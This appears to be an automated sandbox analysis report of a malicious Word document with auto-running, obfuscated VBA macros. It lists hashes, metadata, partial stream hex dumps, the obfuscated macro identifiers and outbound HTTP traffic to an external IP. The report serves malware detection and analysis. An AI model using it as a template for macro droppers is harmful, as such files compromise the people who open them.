                                          SHA-256:D09BACE1490F6EE322262FF2DA373E861F3B3B9BC03C386CE8A031648F1EAA4F
                                          SHA-512:5D55BC984F6A044877912CBE0BA40DE0210CF25C7E4FB32CBE6DB9D5C60306280CD5EC84DF1674024CA89AD67FA49F7AA55CF5BCEAE458D90CE6D86CF209D8D3
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 55%
                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................0...p.......>.......@....@..........................................................................p..."...............................n..................................................................................CODE.............0.................. ..`DATA.........@.......4..............@...BSS..........`.......J...................idata..."...p...$...J..............@....reloc...n.......p...n..............@..P.rsrc...............................@..P....................................@..P........................................................................................................................................................................................................................

                                          Static File Info

                                          General

                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Et odit non optio. Aut reprehenderit eaque ullam. Labore dignissimos rerum rerum voluptas quod et aut assumenda. Qui sed eos sit suscipit., Author: Victoria Murillo, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Jan 25 09:28:00 2021, Last Saved Time/Date: Mon Jan 25 09:28:00 2021, Number of Pages: 1, Number of Words: 5622, Number of Characters: 32047, Security: 8
                                          Entropy (8bit):6.649833118657555
                                          TrID:
                                          • Microsoft Word document (32009/1) 79.99%
                                          • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                          File name:Arch_2021_717-1562532.doc
                                          File size:175104
                                          MD5:d8358bce25bf7488068cfa9490205833
                                          SHA1:35c09dac297f82402a99de172600ba40d87c3ab7
                                          SHA256:b253cf724dd411f9a433e2595d82ee412c28ae67c09ea0538d382334f2684f10
                                          SHA512:35fa8ecc7500a603d88f03272a949a6439d19e1d89a9ef7dcbe2f9cc425d67896ddc3caa43cd88f2e979d4f63e8d061f7725074b308ec3aca96b11999e75f32e
                                          SSDEEP:1536:OJlTNVRcrrMUXyaJBsc3txOOgvWJVTjxo4Iri1R1ffFdRny8Z:+TdcrrXyQBsc0vWJVi4IrwVPRX
                                          File Content Preview:........................>................................... ..................................................................................................................................................................................................

                                          File Icon

                                          Icon Hash:e4eea2aaa4b4b4a4

                                          Static OLE Info

                                          General

                                          Document Type:OLE
                                          Number of OLE Files:1

                                          OLE File "Arch_2021_717-1562532.doc"

                                          Indicators

                                          Has Summary Info:True
                                          Application Name:Microsoft Office Word
                                          Encrypted Document:False
                                          Contains Word Document Stream:True
                                          Contains Workbook/Book Stream:False
                                          Contains PowerPoint Document Stream:False
                                          Contains Visio Document Stream:False
                                          Contains ObjectPool Stream:
                                          Flash Objects Count:
                                          Contains VBA Macros:True

                                          Summary

                                          Code Page:1252
                                          Title:Et odit non optio. Aut reprehenderit eaque ullam. Labore dignissimos rerum rerum voluptas quod et aut assumenda. Qui sed eos sit suscipit.
                                          Subject:
                                          Author:Victoria Murillo
                                          Keywords:
                                          Comments:
                                          Template:
                                          Last Saved By:
                                          Revision Number:1
                                          Total Edit Time:0
                                          Create Time:2021-01-25 09:28:00
                                          Last Saved Time:2021-01-25 09:28:00
                                          Number of Pages:1
                                          Number of Words:5622
                                          Number of Characters:32047
                                          Creating Application:Microsoft Office Word
                                          Security:8

                                          Document Summary

                                          Document Code Page:-535
                                          Number of Lines:267
                                          Number of Paragraphs:75
                                          Thumbnail Scaling Desired:False
                                          Company:Zapata - de Anda
                                          Contains Dirty Links:False
                                          Shared Document:False
                                          Changed Hyperlinks:False
                                          Application Version:917504

                                          Streams with VBA

                                          VBA File Name: A5ate73kc6cw5njy, Stream Size: 1173
                                          General
                                          Stream Path:Macros/VBA/A5ate73kc6cw5njy
                                          VBA File Name:A5ate73kc6cw5njy
                                          Stream Size:1173
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n < . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:01 16 01 00 00 f0 00 00 00 04 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 0b 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 de 6e 3c 87 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          False
                                          Private
                                          VB_Exposed
                                          Attribute
                                          VB_Name
                                          VB_Creatable
                                          Document_open()
                                          VB_PredeclaredId
                                          VB_GlobalNameSpace
                                          VB_Base
                                          VB_Customizable
                                          VB_TemplateDerived
                                          VBA Code
                                          VBA File Name: Gusca95luq_, Stream Size: 14646
                                          General
                                          Stream Path:Macros/VBA/Gusca95luq_
                                          VBA File Name:Gusca95luq_
                                          Stream Size:14646
                                          Data ASCII:. . . . . . . . . d . . . . . . . . . . . . . . . l . . . . , . . . . . . . . . . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:01 16 01 00 00 f0 00 00 00 64 10 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 6c 10 00 00 1c 2c 00 00 00 00 00 00 01 00 00 00 de 6e b6 8e 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          uldHRAc
                                          BJMbZuJRF
                                          xBaZq)
                                          Const
                                          BvPhx
                                          PTpduh
                                          prhgQCFm
                                          Error
                                          Split(urqwC,
                                          IKEyYJ
                                          cHCfACCC()
                                          fsCkG
                                          ndrons
                                          Split(HYqcb,
                                          Split(fsCkG,
                                          lHXavB
                                          DunxEHX
                                          Split(sHhQm,
                                          WPKmFe
                                          ixJTYF
                                          dFuMF
                                          RcxFVMDOH()
                                          vEmIAMH
                                          BvPhx)
                                          RcxFVMDOH
                                          clPKFBjz
                                          SzdUE
                                          HIXwxDo
                                          urqwC
                                          BJMbZuJRF)
                                          LnRqcjdHC
                                          lhhIDAA)
                                          mnSyJHAv()
                                          JaknVR)
                                          Split(WPKmFe,
                                          JtcSFJR()
                                          xBaZq
                                          AQJEzpnoG
                                          mxkikw
                                          Array((qtNpWFzCE),
                                          SVfwH)
                                          DObDSSSH
                                          "ndpns
                                          kWUSef
                                          mnSyJHAv
                                          IkIlHED)
                                          yNpnD
                                          riWqFGJY
                                          pqwm,
                                          lrUBAA
                                          TjMQdBBgE
                                          ZJSnRBDm)
                                          espWEuWIh
                                          JjJbB
                                          sHhQm
                                          OOobG
                                          OOobG()
                                          CNUcG
                                          Split(nvNjhAFA,
                                          Array((eBzEFGPxh),
                                          uZukAmEA
                                          qtNpWFzCE
                                          Array((KAAmsFJLa),
                                          Range:
                                          eGHABDHYI
                                          Array((LpCFBdE),
                                          "*high*,*critic*"
                                          WzIrJQJ
                                          tWLOCW
                                          Array((yNpnD),
                                          xjjUNmJ
                                          WiAHIOige
                                          vEmIAMH:
                                          VHxfT
                                          kXidGGmrk()
                                          DGpFCB
                                          mjbBYHhbs
                                          wJdJAI)
                                          Array((dvuZzGDnA),
                                          Split(DSEaFYQ,
                                          DGpFCB()
                                          Split(rSrZBJJv,
                                          otHyDQA
                                          ZJSnRBDm
                                          String
                                          sujuoHFCJ
                                          YtjFBe:
                                          aACrBzCHd
                                          PEoELvIQJ()
                                          Array((cyDODgZgJ),
                                          kRgnIQJCn
                                          SVfwH
                                          rSrZBJJv
                                          zYRcUHEHG
                                          prhgQCFm:
                                          Split(XlUFJHR,
                                          Nothing
                                          Split(sujuoHFCJ,
                                          VcboAE
                                          XpIXCDhMq
                                          ArMYJEkJb:
                                          fEDGCAg
                                          PASRFGECE
                                          PASRFGECE()
                                          ctRAim
                                          jyxYAFLC
                                          QFAdJG:
                                          Array((muQUuJD),
                                          eBzEFGPxh
                                          Split(ctRAim,
                                          vDIdCwGfT
                                          Split(XpIXCDhMq,
                                          PCtZE)
                                          yPcgGA
                                          NYPQCHF
                                          ZDKqIFEBG()
                                          nd:wns
                                          OwqxzJE)
                                          kXidGGmrk
                                          xfQswJFE
                                          Resume
                                          tCOXBDEPL
                                          VHxfT:
                                          OwqxzJE
                                          ortGB
                                          NFoIZAgdj
                                          DunxEHX()
                                          wJdJAI
                                          ifTgDoG)
                                          hxzoFBtLC
                                          HYqcb
                                          Split(fEDGCAg,
                                          PwyZCI
                                          ndgmns
                                          NGzByr
                                          ffeODEi:
                                          PTpduh:
                                          jzCVAIVG
                                          cpeHA
                                          UTlaBhGD:
                                          nEsTCdYDH
                                          Array((huVBjtENv),
                                          ndinns
                                          elqXMZ:
                                          xnvME()
                                          HKXrDBEI
                                          JaknVR
                                          Array((jyxYAFLC),
                                          Mid(skuwd,
                                          Target)
                                          bpMND
                                          LXXQDDfJ
                                          PCtZE
                                          Split(TjMQdBBgE,
                                          AQJEzpnoG:
                                          gvcgAIUM
                                          sOfSqNO
                                          tCOXBDEPL()
                                          MhDEGJ()
                                          NGzByr:
                                          ortGB:
                                          pNdoqWCxt)
                                          SbmMCGuEY
                                          zYRcUHEHG:
                                          IOPMfG()
                                          nvNjhAFA
                                          elqXMZ
                                          Array((DObDSSSH),
                                          Split(NvjyW,
                                          JvTSZI
                                          IkIlHED
                                          ffeODEi
                                          XlUFJHR
                                          DSEaFYQ
                                          AQOwDFGF
                                          UTlaBhGD
                                          UsjaB
                                          ndmns
                                          WiAHIOige:
                                          Attribute
                                          IUHjJ
                                          uZukAmEA()
                                          NYPQCHF)
                                          Split(riWqFGJY,
                                          PmuwJBJH
                                          LpCFBdE
                                          IOPMfG
                                          ndsns
                                          aACrBzCHd()
                                          Array((eGHABDHYI),
                                          huVBjtENv
                                          Array((SbmMCGuEY),
                                          Array((xfQswJFE),
                                          ZDKqIFEBG
                                          DKUOJzi
                                          kWUSef:
                                          cyDODgZgJ
                                          KAAmsFJLa
                                          VB_Name
                                          CNUcG()
                                          wdpnM
                                          Content
                                          Array((dFuMF),
                                          Split(VcboAE,
                                          tWLOCW()
                                          dvuZzGDnA
                                          Split(cpeHA,
                                          Function
                                          xnvME
                                          JtcSFJR
                                          ixJTYF)
                                          Array((IKEyYJ),
                                          VZWOFv()
                                          AQOwDFGF:
                                          oAcbS
                                          tuLCMCI
                                          JvTSZI:
                                          cjdFFEGu
                                          hxzoFBtLC)
                                          rykKLTfBV
                                          HsRXzxA
                                          ndtns
                                          FGWgu
                                          VZWOFv
                                          YtjFBe
                                          nd_ns
                                          dBZlAG)
                                          Array((WzIrJQJ),
                                          Array((zHRlEdEP),
                                          cHCfACCC
                                          Len(skuwd))
                                          ifTgDoG
                                          QFAdJG
                                          Array((SzdUE),
                                          PEoELvIQJ
                                          Array((bpMND),
                                          NFoIZAgdj)
                                          Split(sOfSqNO,
                                          pNdoqWCxt
                                          Split(PmuwJBJH,
                                          ArMYJEkJb
                                          UsjaB)
                                          lhhIDAA
                                          MhDEGJ
                                          zHRlEdEP
                                          muQUuJD
                                          Mid(Application.Name,
                                          Array((jzCVAIVG),
                                          Split(JjJbB,
                                          LnRqcjdHC:
                                          NvjyW
                                          String:
                                          uldHRAc)
                                          PdrYYCtJ
                                          IUHjJ:
                                          otHyDQA()
                                          yPcgGA)
                                          HsRXzxA:
                                          skuwd
                                          dBZlAG
                                          VBA Code
                                          VBA File Name: Zcf1kk3t2ssv4r07m, Stream Size: 704
                                          General
                                          Stream Path:Macros/VBA/Zcf1kk3t2ssv4r07m
                                          VBA File Name:Zcf1kk3t2ssv4r07m
                                          Stream Size:704
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 de 6e eb 0c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                          VBA Code Keywords

                                          Keyword
                                          Attribute
                                          VB_Name
                                          VBA Code

                                          Streams

                                          Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                          General
                                          Stream Path:\x1CompObj
                                          File Type:data
                                          Stream Size:146
                                          Entropy:4.00187355764
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 312
                                          General
                                          Stream Path:\x5DocumentSummaryInformation
                                          File Type:data
                                          Stream Size:312
                                          Entropy:2.95489013267
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . . . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . K . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 08 01 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 ec 00 00 00 05 00 00 00 70 00 00 00 06 00 00 00 78 00 00 00 11 00 00 00 80 00 00 00 17 00 00 00 88 00 00 00 0b 00 00 00 90 00 00 00 10 00 00 00 98 00 00 00 13 00 00 00 a0 00 00 00
                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 548
                                          General
                                          Stream Path:\x5SummaryInformation
                                          File Type:data
                                          Stream Size:548
                                          Entropy:4.00721224034
                                          Base64 Encoded:False
                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 f4 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 60 01 00 00 03 00 00 00 98 00 00 00 04 00 00 00 44 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 c8 00 00 00 09 00 00 00 d4 00 00 00
                                          Stream Path: 1Table, File Type: data, Stream Size: 6885
                                          General
                                          Stream Path:1Table
                                          File Type:data
                                          Stream Size:6885
                                          Entropy:6.02650234948
                                          Base64 Encoded:True
                                          Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                          Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                          Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 520
                                          General
                                          Stream Path:Macros/PROJECT
                                          File Type:ASCII text, with CRLF line terminators
                                          Stream Size:520
                                          Entropy:5.52447471798
                                          Base64 Encoded:True
                                          Data ASCII:I D = " { B 3 1 5 C D 8 3 - A E F A - 4 B 0 A - 9 9 4 6 - 6 3 1 D 4 8 9 C 2 2 F 0 } " . . D o c u m e n t = A 5 a t e 7 3 k c 6 c w 5 n j y / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Z c f 1 k k 3 t 2 s s v 4 r 0 7 m . . M o d u l e = G u s c a 9 5 l u q _ . . E x e N a m e 3 2 = " J v k 5 9 3 o d o w j q u y o o " . . N a m e = " m x " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A F A D 4 6 4 D F A F 3 D 1 F 7 D 1 F 7 D 1 F 7 D 1 F 7 "
                                          Data Raw:49 44 3d 22 7b 42 33 31 35 43 44 38 33 2d 41 45 46 41 2d 34 42 30 41 2d 39 39 34 36 2d 36 33 31 44 34 38 39 43 32 32 46 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 41 35 61 74 65 37 33 6b 63 36 63 77 35 6e 6a 79 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 5a 63 66 31 6b 6b 33 74 32 73 73 76 34 72 30 37 6d 0d 0a 4d 6f 64 75 6c 65 3d 47 75 73 63 61 39 35 6c 75 71 5f 0d
                                          Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 143
                                          General
                                          Stream Path:Macros/PROJECTwm
                                          File Type:data
                                          Stream Size:143
                                          Entropy:3.86963281051
                                          Base64 Encoded:False
                                          Data ASCII:A 5 a t e 7 3 k c 6 c w 5 n j y . A . 5 . a . t . e . 7 . 3 . k . c . 6 . c . w . 5 . n . j . y . . . Z c f 1 k k 3 t 2 s s v 4 r 0 7 m . Z . c . f . 1 . k . k . 3 . t . 2 . s . s . v . 4 . r . 0 . 7 . m . . . G u s c a 9 5 l u q _ . G . u . s . c . a . 9 . 5 . l . u . q . _ . . . . .
                                          Data Raw:41 35 61 74 65 37 33 6b 63 36 63 77 35 6e 6a 79 00 41 00 35 00 61 00 74 00 65 00 37 00 33 00 6b 00 63 00 36 00 63 00 77 00 35 00 6e 00 6a 00 79 00 00 00 5a 63 66 31 6b 6b 33 74 32 73 73 76 34 72 30 37 6d 00 5a 00 63 00 66 00 31 00 6b 00 6b 00 33 00 74 00 32 00 73 00 73 00 76 00 34 00 72 00 30 00 37 00 6d 00 00 00 47 75 73 63 61 39 35 6c 75 71 5f 00 47 00 75 00 73 00 63 00 61 00 39
                                          Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4837
                                          General
                                          Stream Path:Macros/VBA/_VBA_PROJECT
                                          File Type:data
                                          Stream Size:4837
                                          Entropy:5.51877025189
                                          Base64 Encoded:True
                                          Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                          Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                          Stream Path: Macros/VBA/dir, File Type: WE32000 COFF executable not stripped N/A on 3b2/300 w/paging - version 18435, Stream Size: 628
                                          General
                                          Stream Path:Macros/VBA/dir
                                          File Type:WE32000 COFF executable not stripped N/A on 3b2/300 w/paging - version 18435
                                          Stream Size:628
                                          Entropy:6.34127378287
                                          Base64 Encoded:True
                                          Data ASCII:. p . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . Y m . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . O f f i c . . E O . f . . i . c 5 . E . . . . . . . E 2 D . F 8 D 0 4 C - 5 . B F A - 1 0 1 B -
                                          Data Raw:01 70 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 59 6d fe 61 1a 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                          Stream Path: WordDocument, File Type: data, Stream Size: 129150
                                          General
                                          Stream Path:WordDocument
                                          File Type:data
                                          Stream Size:129150
                                          Entropy:7.03372694627
                                          Base64 Encoded:True
                                          Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . % . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . . b . . . b . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                          Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f1 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 25 9b 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 7e f8 01 00 62 7f 00 00 62 7f 00 00 25 93 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
                                          Stream Path: office, File Type: data, Stream Size: 566
                                          General
                                          Stream Path:office
                                          File Type:data
                                          Stream Size:566
                                          Entropy:7.62667703991
                                          Base64 Encoded:False
                                          Data ASCII:. ~ . . . . . . 0 . . . . . a . Q . . . . u N . . . . . @ . l . Y . . . . . . . l . . . . . . . , y 0 p . . . . / . . . . . . { . . . . f . . . h . e _ . . . . . Q . . . . + . \\ . [ 3 . . . . . z . . > . H U . t . . P J . { . . ^ . M . . . ^ . . p { r . \\ . . . . . . . . . < . . . . S . . . ! . . 9 ? . . 1 6 9 . . . ` . . G w . . . . . u . . . . . K . . . . P . . . . . . . . . . 1 b . . G . . L . / ) . 9 . - . . n . . . M > . . . . . . . . . . . . . x e | . . N . l & . t . k . . + . . E . # . . I . . . O .
                                          Data Raw:05 7e 92 a5 9d 13 9e 08 30 1e 99 01 10 eb 61 9c 51 88 d9 d2 03 75 4e cf e3 8a 00 be 40 b5 6c 0e 59 06 85 8a f6 95 1f 0e 6c a3 f6 9a 1f e6 d5 ae 2c 79 30 70 e3 b5 a9 8f 2f c2 c1 13 13 df c7 7b b2 8a a8 09 66 d6 a6 bb 68 cb 65 5f 7f b3 af fd b4 51 92 c7 84 fb 2b a3 5c f5 5b 33 d4 0c fa 8c db 7a e8 95 3e cb 48 55 d2 74 07 17 50 4a 10 7b 12 c4 5e c1 4d 00 f7 b6 5e 05 ac 70 7b 72 e7 5c

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          Timestamp                            Source Port   Dest Port   Source IP        Dest IP
                                          Jan 26, 2021 13:33:15.223942995 CET  49167         80          192.168.2.22     192.169.223.13
                                          Jan 26, 2021 13:33:15.410352945 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:15.410434008 CET  49167         80          192.168.2.22     192.169.223.13
                                          Jan 26, 2021 13:33:15.412739992 CET  49167         80          192.168.2.22     192.169.223.13
                                          Jan 26, 2021 13:33:15.641016006 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:15.826479912 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:15.826522112 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:15.826546907 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:15.826564074 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:15.826571941 CET  49167         80          192.168.2.22     192.169.223.13
                                          Jan 26, 2021 13:33:15.826592922 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:15.826617002 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:15.826625109 CET  49167         80          192.168.2.22     192.169.223.13
                                          Jan 26, 2021 13:33:15.826658010 CET  49167         80          192.168.2.22     192.169.223.13
                                          Jan 26, 2021 13:33:15.827126980 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:15.827143908 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:15.827161074 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:15.827193022 CET  49167         80          192.168.2.22     192.169.223.13
                                          Jan 26, 2021 13:33:15.827248096 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.014534950 CET  80            49167       192.169.223.13   192.168.2.22
                                          Jan 26, 2021 13:33:16.014573097 CET  80            49167       192.169.223.13   192.168.2.22
